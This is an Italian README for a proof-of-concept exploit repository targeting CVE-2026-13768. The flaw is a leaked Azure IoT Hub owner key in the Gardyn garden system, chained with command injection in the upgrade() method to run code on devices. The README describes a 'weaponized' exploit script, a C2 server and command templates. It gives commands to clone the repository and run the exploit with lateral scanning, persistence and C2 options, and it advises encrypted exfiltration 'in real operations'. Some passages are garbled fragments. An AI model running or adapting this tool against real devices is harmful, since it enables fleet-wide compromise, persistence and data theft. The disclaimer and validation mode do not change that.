
Azure IoT Hub in cui l'esposizione di una chiave di accesso condiviso a livello di proprietario consente l'esecuzione remota di codice (RCE) non autenticata sui dispositivi IoT connessi. Proof-Of-Concept
[!WARNING] Questo repository contiene una proof-of-concept pienamente funzionante per una vulnerabilità IoT ad alta gravità.
Questo codice è fornito esclusivamente per scopi educativi, ricerca di sicurezza autorizzata e test difensivi.L'uso non autorizzato è illegale. Testare o sfruttare sistemi senza l'esplicito permesso scritto del proprietario viola il Computer Fraud and Abuse Act (CFAA), l'EU Cyber Resilience Act e altre leggi applicabili nella tua giurisdizione.
Gli autori declinano ogni responsabilità per qualsiasi uso improprio, danno o conseguenza legale derivante da questo codice.
Opera sempre entro confini legali ed etici.
CVE-2026-13768 espone la stringa di connessione a livello di proprietario dell'IoT Hub nel sistema di giardinaggio intelligente Gardyn, consentendo il pieno controllo amministrativo sull'Azure IoT Hub. Questa PoC dimostra come un attaccante in possesso della chiave del proprietario possa ottenere esecuzione remota di codice (RCE) sui dispositivi connessi tramite iniezione di comandi nel metodo cloud-to-device upgrade(), consentendo la compromissione dell'intera flotta.
La suite include:
Questo è un progetto di ricerca in continua evoluzione - usalo in modo responsabile per comprendere e difendersi dalle misconfigurazioni della supply chain e del cloud IoT.
upgrade() (sfruttando l'iniezione di comandi di CVE-2025-29631).
├── poc.py # Main weaponized exploitation script
├── validate.py # Safe, read-only validation tool
├── c2s.py # Lightweight C2 server for demos
├── TEMPLATES.md # Ready-to-Use Command Templates.
├── README.md
Clona il repository:
git clone https://github.com/J4ck3LSyN-Gen2/CVE-2026-13768.git
cd CVE-2026-13768
python3 -m venv venv
Attiva l'ambiente virtuale (o creane uno):
source venv/bin/activate
python3 -m pip install --upgrade pip
Installa le dipendenze.
python3 -m pip install azure-iot-hub
python validate.py --conn-str "HostName=yourhub.azure-devices.net;SharedAccessKeyName=iothubowner;SharedAccessKey=..."
Codice di uscita 0 = Chiave del proprietario valida con dispositivi accessibili. Non viene apportata alcuna modifica.
python poc.py \
--mode exploit \
--conn-str "HostName=..." \
--device-id "target-device-123" \
--command "whoami" \
--lateral-scan \
--persist
Esegui python poc.py --help per tutte le opzioni.
python c2s.py --port 4444
iothubownerupgrade()Nota: Il codice per il movimento laterale e la persistenza è un segnaposto illustrativo. Adattalo al sistema operativo e ai vincoli del dispositivo target (ad es. ambienti con limitazioni BusyBox).
/tmp/cve_2026_13768.log per impostazione predefinita. Sostituiscilo con esfiltrazione crittografata nelle operazioni reali.obfuscate_cmd() / deobfuscate_cmd().Sono benvenuti contributi per:
Apri pure issue o PR.
Da grandi poteri derivano grandi responsabilità.
| Argomento | Descrizione | Obbligatorio |
|---|
--mode | validate o exploit | No (predefinito: validate) |
--conn-str | Stringa di connessione del proprietario IoT Hub | Sì |
--device-id | ID del dispositivo target | Sì (modalità exploit) |
--command | Comando da eseguire tramite iniezione in upgrade() | No (predefinito: id) |
--lateral-scan | Abilita la ricognizione LAN dal dispositivo | No |
--persist | Tenta la persistenza (es. cron, systemd) | No |
--c2 | Collegati al server C2 | No |